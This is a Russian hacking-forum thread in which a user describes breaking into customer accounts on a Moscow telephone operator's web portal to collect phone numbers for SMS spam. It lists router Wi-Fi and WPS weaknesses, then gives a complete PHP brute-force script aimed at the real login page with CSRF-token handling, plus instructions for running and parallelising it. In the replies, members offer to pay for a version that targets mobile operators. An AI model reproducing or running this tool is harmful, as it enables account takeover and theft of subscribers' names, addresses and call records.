1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Взлом МГТС клиентов

Тема в разделе "АРХИВ СТАТЕЙ", создана пользователем zir0diy, 13 янв 2016.

  1. zir0diy
    off

    zir0diy n.N.N.n.n УЧАСТНИКИ

    Сообщения:
    175
    Пол:
    Мужской
    Адрес:
    error
    Репутация:
    34
    Сфера:
    Вирусология
    Взлом МГТС клиентов

    Все началось с того, что мне понадобилась база телефонных номеров (клиентов) одного интернет магазина. Загвоздка заключалась в том, что там был обычный HTML landing page с формой и номером телефона для заказов. Это был VPS без соседей и с одни открытым портом веб сервера, с таким раскладом мало, что придумаешь. Мне нужны были только номера для смс рассылки и поэтому я решил ковырять номер с сайта 495. Я думал это будет астерикс какой то компании или частный, но как показал справочник телефонных номеров, этот номер принадлежал МГТС. Конечно же я не знал, что я увижу в личном кабинете и поэтому нашел акк в логах. В ЛК было именно то, что мне нужно. Об этом я расскажу ниже.


    Услугами МГТС на 2015 год пользуется более 5 000 000 человек в Москве, при взломе личного кабинета мы можем получить конфиденциальные данные.

    Наиболее интересные:

    1. ФИО клиента

    2. Адрес клиента (если использовать СИ)

    3. Подробная детализация всех разговоров и список номеров (по месяцам)

    Прежде чем я опишу свою методику взлома ЛК МГТС, я бы хотел кратенько пробежаться по основным бага, которые нашел в интернет.

    [​IMG]


    1. Пароль на WiFi – это ваш номер телефона (в ходе исследования встречались ленивые монтажники, которые оставляли паролем MAC-адрес роутера без первых 4-х знаков).Это означает, что взломать Wi-Fi техникой перебора хэндшейка по маске 495?d?d?d?d?d?d?d.

    2. Речь идет об уязвимости технологии беспроводной настройки WPS, которая включена по-умолчанию на роутерах ZTE ZXA 10 F660. И если в случае с организационным просчетом, подставившим сети пользователей на уровне паролей злоумышленник не может массово взламывать абонентов, занимаясь каждым по-отдельности, то при эксплуатации WPS-уязвимости роутера этой модели взлом сетей может быть поставлен на поток. Технология работает следующим образом — для WPS-соединения используется пин-код, состоящий из 8 цифр. При получении правильного пинкода роутер отдает реальный Wi-Fi пароль. Мало того, что этот пин-код может быть взломан с использованием известного инструмента Reaver куда эффективнее и быстрее сложного WPA2 пароля, но главная проблема — он единый для всех роутеров ZTE ZXA10 F660! Более того, его легко можно найти за 10 минут в интернете. Повторяю — зная этот пин-код(который нельзя ни поменять, ни выключить) в течении 3 секунд получается реальный Wi-Fi пароль любой сложности и типа шифрования, либо производится прямое подключение к сети абонента. Таким образом «счастливые» обладатели именно этой модели оборудования (а их у оператора всего 2, так что шанс 50/50) даже установив невозможный ко взлому пароль на беспроводную сеть все равно из-за несовершенства технологии будут взломаны менее, чем за 5 секунд.

    Это все довольно старые баги и как мне кажется уже не актуальные, хотя возможно остались еще миллионы пользователей за 2012-2013 год. которые им подвержены. Меня интересовал удаленный взлом и по этому я решил ковырять сам.

    Взлом login.mgts.ru своими руками

    Я начал свой поиск уязвимостей с ула авторизации в ЛК (https://login.mgts.ru), куда мне и нужно было попасть. В принципе идея родилась сразу после того, как я проверил защиту от брута при вбиве логина и пароля в форму авторизации на сайте. Как оказалось у них не было защиты от брута. Позвонив пару раз в компанию, я выяснил, что логином является номер телефона без кода города (пример: 4950000000). Покапавший в логах я нашел пару акков от ЛК МГТС и от туда сделал вывод, что пароль состоит только из цифр и его длина 8 знаков. Получается мне нужно было написать брутер, который бы работал по диапазону от 00000000 до 99999999.

    Написание брутера для ЛК МГТС

    // brute Zir0diy from MGTS

    [​IMG] это приватная версия специально для участников nora.biz


    <?

    // brute Zir0diy from MGTS

    set_time_limit(0);

    $mainLogin = '1234567890';
    $begin = intval('00000000');
    $end = intval('00000010');

    //$data = file_get_contents('data.txt');
    //$accounts = explode("\n", $data);

    for ($code = $begin; $code <= $end; $code++) {
    $login = $mainLogin;
    $password = str_pad($code, 8, "0", STR_PAD_LEFT);

    if ($login AND $password) {
    echo $login . ';' . $password . ": ";
    $result = checkAccount($login, $password);
    if ($result == true) {
    file_put_contents("valid.txt", $login . ";" . $password . "\r\n", FILE_APPEND);
    echo "valid! \r\n";
    } else {
    file_put_contents("invalid.txt", $login . ";" . $password . "\r\n", FILE_APPEND);
    echo "inv. \r\n";
    }
    }
    }

    function checkAccount($login, $password)
    {
    if ($curl = curl_init()) {
    curl_setopt($curl, CURLOPT_URL, 'https://login.mgts.ru/amserver/UI/Login');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_COOKIEFILE, '');
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLINFO_HEADER_OUT, true);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko');

    $page = curl_exec($curl);

    $result = array();
    // csfr.sign
    $match = preg_match("/name=\"csrf\.sign\" value=\"([a-zA-Z0-9]+)/", $page, $result);
    $sign = @$result[1];
    // csfr.ts
    $match = preg_match("/name=\"csrf\.ts\" value=\"([0-9]+)/", $page, $result);
    $ts = @$result[1];

    if (strlen($sign) != 64 OR strlen($ts) != 13) {
    file_put_contents('errors/page_' . $password . '.html', $page);
    return false;
    }

    $postdata = http_build_query(array(
    'IDToken1' => $login,
    'IDToken2' => $password,
    'IDButton' => 'Submit',
    'csrf.sign' => $sign,
    'csrf.ts' => $ts
    ));

    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt($curl, CURLOPT_HTTPHEADER, array(
    'Origin: https://login.mgts.ru',
    'Referer: https://login.mgts.ru/amserver/UI/Login'
    ));

    $page = curl_exec($curl);
    curl_close($curl);

    if(strpos($page, 'Введён неверный номер телефона/имя пользователя либо PIN-код.'))
    return false;
    else
    return true;

    } else
    die('cURL error!');

    return false;
    }

    ?>




    Пользоваться довольно просто:

    1) Редактируем файл brute.php


    $mainLogin = '4950000000'; //Номер телефона клиента, он же логин
    $begin = intval('00000000'); // начало диапазона для перебора
    $end = intval('00000010'); // конец диапазона для перебора




    2) Заливаем на сервер

    3) Запускаем от ROOT скрипт вот так: php5 brute.php

    Если выдает ошибку curl:

    Если произошла ошибка curl, то нужно установить curl для php (для debian: apt-get install php5-curl)

    Советы как ускорить перебор:

    Закиньте брутер на свой ВПС в 8 папок и запускайте все 8 с различными диапазонами:


    c 00000000 по 11111111
    c 11111111 по 22222222
    c 22222222 по 33333333
    и т.д




    В папке errors будут лежать не отработанные комбинации, такое бывает из за потери сети. В файле invalid.txt будут лежать отработанные комбинации, ну а в valid.txt нужный нам пароль.

    Автор: Zir0diy
     
  2. pushUP
    off

    pushUP Всегда свежие БА VERIFIED БИЗНЕС

    Сообщения:
    9
    Пол:
    Мужской
    Адрес:
    London
    Репутация:
    0
    Сфера:
    Кардинг
    у кого стоит? кто может 1 номер посмотреть?
     
  3. Nesquik
    off

    Nesquik Теперь банановый УЧАСТНИКИ

    Сообщения:
    57
    Пол:
    Мужской
    Адрес:
    TetraPark
    Репутация:
    12
    Сфера:
    Другое
    Кто сможет за деньги переписать под личные кабинеты мобильных операторов и добавить капчу?
     
  4. zir0diy
    off

    zir0diy n.N.N.n.n УЧАСТНИКИ

    Сообщения:
    175
    Пол:
    Мужской
    Адрес:
    error
    Репутация:
    34
    Сфера:
    Вирусология
    И можно сервис открывать :)
    Я бы мог время выбрать и написать, только зачем мне это?
    Стартап 500$ и могу начать разработку скрипта для подбора пароля с капчей и другими фичами.
     
  5. Dr.Psix
    off

    Dr.Psix Белый билет СПЕЦИАЛИСТ

    Сообщения:
    53
    Пол:
    Мужской
    Адрес:
    ?id='
    Репутация:
    15
    Сфера:
    Хакинг
    Кикие 500$ земляк? Посмотрел твой код и https://login.mts.ru, он будет без проблем работать =| Капчи там нет!